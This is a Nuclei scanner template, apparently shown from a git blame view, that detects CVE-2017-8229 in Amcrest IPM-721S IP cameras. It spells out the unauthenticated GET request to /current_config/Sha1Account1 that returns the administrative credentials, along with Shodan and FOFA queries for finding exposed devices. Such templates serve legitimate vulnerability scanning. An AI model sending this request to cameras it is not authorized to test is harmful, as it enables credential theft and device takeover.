nuclei-templates/http/cves/2017/CVE-2017-8229.yaml

55 lines
1.5 KiB
YAML
Raw Normal View History

2023-08-10 05:18:14 +00:00
id: CVE-2017-8229
info:
name: Amcrest IP Camera Web Management - Data Exposure
author: pussycat0x
severity: critical
description: |
2023-08-10 05:53:25 +00:00
Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest firmware update provided by the vendor to fix the vulnerability.
2023-08-10 05:18:14 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
2023-08-10 05:53:25 +00:00
- http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
- https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
2023-08-31 11:46:18 +00:00
- https://seclists.org/bugtraq/2019/Jun/8
2023-08-10 05:53:25 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-08-31 11:46:18 +00:00
cve-id: CVE-2017-8229
2023-08-10 05:53:25 +00:00
cwe-id: CWE-255
2023-10-14 11:27:55 +00:00
epss-score: 0.94037
epss-percentile: 0.98875
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:*
2023-08-10 05:18:14 +00:00
metadata:
2023-08-10 05:53:25 +00:00
verified: true
2023-09-06 13:22:34 +00:00
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: amcrest
product: ipm-721s_firmware
2023-09-06 13:22:34 +00:00
shodan-query: html:"Amcrest"
fofa-query: "Amcrest"
2023-10-14 11:27:55 +00:00
tags: packetstorm,seclists,cve,cve2017,amcrest,iot
2023-08-10 05:18:14 +00:00
http:
- method: GET
path:
2023-08-10 05:53:25 +00:00
- "{{BaseURL}}/current_config/Sha1Account1"
2023-08-10 05:18:14 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DevInformation"
- "SerialID"
condition: and
2023-08-10 05:53:25 +00:00
- type: word
part: header
words:
- "application/octet-stream"
2023-08-10 05:18:14 +00:00
- type: status
status:
- 200